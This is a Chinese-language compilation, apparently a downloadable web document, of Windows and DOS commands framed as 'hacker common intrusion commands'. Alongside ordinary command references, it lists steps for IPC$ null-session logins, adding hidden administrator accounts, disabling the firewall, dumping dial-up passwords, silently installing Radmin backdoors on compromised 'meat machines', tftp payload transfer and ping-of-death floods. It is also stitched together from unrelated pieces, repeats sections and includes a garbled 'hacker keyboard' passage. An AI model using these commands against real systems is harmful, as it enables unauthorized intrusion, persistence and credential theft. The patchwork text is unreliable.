下载文档原格式
net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
黑客键盘使用方法导语:黑客键盘作为黑客工具的重要一环,具有强大的功能和灵活的操作方式。
本文将详细介绍黑客键盘的使用方法,包括快捷键、命令输入和常用功能等,帮助读者更好地利用黑客键盘进行操作和实施安全测试。
一、快捷键1. Tab键:在命令行中,Tab键用于自动补全命令和文件路径,提高输入效率。
2. Ctrl+C:用于终止当前运行的命令,相当于“结束任务”。
3. Ctrl+Z:将当前命令放到后台运行,可以使用“fg”命令将其重新调回。
4. Ctrl+D:退出当前会话或终止当前进程。
5. Ctrl+Alt+Del:强制重启计算机,常用于解决系统死机或无响应问题。
6. Ctrl+Shift+Esc:打开任务管理器,可以查看和关闭正在运行的程序。
二、命令输入1. 常用命令:(1)ping:用于测试网络连通性,检测目标主机是否在线。
(2)tracert:用于跟踪数据包在网络中的路径,分析网络延迟和故障。
(3)netstat:用于查看网络连接、监听端口和网络统计信息。
(4)ipconfig:用于查看和配置网络接口信息,包括IP地址、子网掩码等。
(5)nslookup:用于查询域名对应的IP地址或反向查询。
2. 命令参数:(1)-h:显示命令的帮助信息。
(2)-a:显示完整的信息,包括IP地址、主机名等。
(3)-n:以数字形式显示结果,不进行域名解析。
(4)-r:刷新DNS缓存,更新域名解析信息。
三、常用功能1. 端口扫描:使用黑客键盘可以通过输入命令扫描目标主机的开放端口,以便发现系统漏洞和安全风险。
2. 暴力破解:黑客键盘可以通过输入命令进行用户名和密码的暴力破解,测试目标系统的安全性。
3. 木马植入:黑客键盘可以通过输入命令植入木马程序,实现对目标主机的远程控制和信息窃取。
4. 数据包嗅探:通过黑客键盘输入相应命令,可以监听网络数据包,获取目标主机的敏感信息。
5. 漏洞利用:黑客键盘可以输入命令调用已知漏洞的利用工具,攻击目标系统,实现权限提升和系统入侵。
cmd.exe是一个命令扩展接口,外面利用它可以执行系统的环境变量下的任意可执行程序,操作类似与以前的ms-dos,但功能却比ms-dos要强大的多,虽然学习有点抽象,但我们只要把ms-dos的基础打好,也很容易上手,如果各位对dos命令很陌生的话,就先去补习一下dos命令再来看本文,如果文章前那位是位system高手,就请掠过次页吧,好了不多说废话,请看下面:一、外部命令:1、 atmadm.exe:打开ATM调用管理器,-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。
2、 arp.exe:查看和修改本地ARP(地址解析协议)表项命令,/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。
在使用ARP命令是通常是先PING 对方或网关的IP地址。
3、 attrib.exe:文件属性设置,+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件(支持通配符)、/d代表设置文件夹(支持通配符),设置选项如下:a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。
比如给c:\windows所有目录及子目录加系统、隐藏属性,命令如下:attrib +s +dc:\windows\*.* /s /d 。
4、 auditusr.exe:设置每用户审核策略,/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。
5、 blastcln.exe:微软的恶意程序移除工具命令行程序,只有/v参数,运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。
检测完毕之后会给出报告。
6、 bootcfg.exe:系统启动项配置程序,考虑到参数众多又对外面无多么大实际作用,大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。
黑客常用入侵命令控制面版:运行>>>>>>>>>>>:control计算机管理:command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务:net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如:)结束进程:NET SHARE查看版本:ver查看中端(服务):net start查看文件:dir查看3389:加用户:c:\winnt\system32>net user adminserver$ admin /add提权限:net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令:telnet 主机IP踢人:logoff ID查看当前人:query user打开telnet:net start telnettelnet连接工具:OpenTelnet删除共享:net share c$=c:\删除共享:net share c$ /del启用GUEST:net user guest /active:yes为GUEST设密码:net user guest 888888提升到管理员:net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号:ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向:f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下:c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。
黑客常用dos命令学习黑客必先修炼dos操作,一个好的黑客,dos 是基础,零基础入门到精通全套黑客视频教程视频教程黑客常用dos命令(1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;(2)该命令不能删除属性为隐含或只读的文件;(3)在文件名称中可以使用通配符;(4)若要删除磁盘上的全部文件(DEL**或DEL),则会提示:(Arey ou sure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。
(八)UNDELETE——恢复删除命令1.功能:恢复被误删除命令2.类型:外部命令。
3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL] 4.使用说明:使用UNDELETE可以使用“*”和“?”通配符。
(1)选用/DOS参数依据名目里残留的记录来恢复文件。
由于文件被删除时,名目所记载斩文件名第一个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。
但此字符不必和原来的一样,只需符合DOS的文件名规章即可。
(2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。
(3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用名目里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选挨次为:#%——0000123456789A~Z。
UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。
七、其它命令(一)CLS——清屏幕命令1功能:清除屏幕上的全部显示,光标置于屏幕左上角。
2类型:内部命令。
Dos常用命令一:net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 9查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件Dos常用命令二:del /S /Q 目录或用:rmdir /s /Q 目录/S删除目录及目录下的所有子目录和文件。
同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
(二个命令作用相同)move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令at id号开启已注册的某个计划任务at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止at id号/delete 停止某个已注册的计划任务at 查看所有的计划任务at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机finger username @host 查看最近有哪些用户登陆telnet ip 端口远和登陆服务器,默认端口为23open ip 连接到IP(属telnet登陆后的命令)telnet 在本机上直接键入telnet 将进入本机的telnetcopy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。
bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interfacearp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。
arp -a将显示出全部信息start 程序名或命令/max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令mem 查看cpu使用情况attrib 文件名(目录名) 查看某文件(目录)的属性attrib 文件名-A -R -S -H 或+A +R +S +H 去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date /t 、time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set 指定环境变量名称=要指派给变量的字符设置环境变量set 显示当前所有的环境变量set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量pause 暂停批处理程序,并显示出:请按任意键继续....if 在批处理程序中执行条件处理(更多说明见if命令及变量)goto 标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call 路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call /?)for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置echo 信息在屏幕上显示出信息echo 信息>> pass.txt 将"信息"保存到pass.txt文件中findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hellofind 文件名查找某文件title 标题名字更改CMD窗口标题名字color 颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt 名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )Dos常用命令三:ver 在DOS窗口下显示版本信息winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format 盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFSmd 目录名创建目录replace 源文件要替换文件的目录替换文件ren 原文件名新文件名重命名文件名tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称type 文件名显示文本文件的内容more 文件名逐屏显示输出文件doskey 要锁定的命令=字符doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。
如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exepath 路径\可执行文件的文件名为可执行文件设置一个路径。
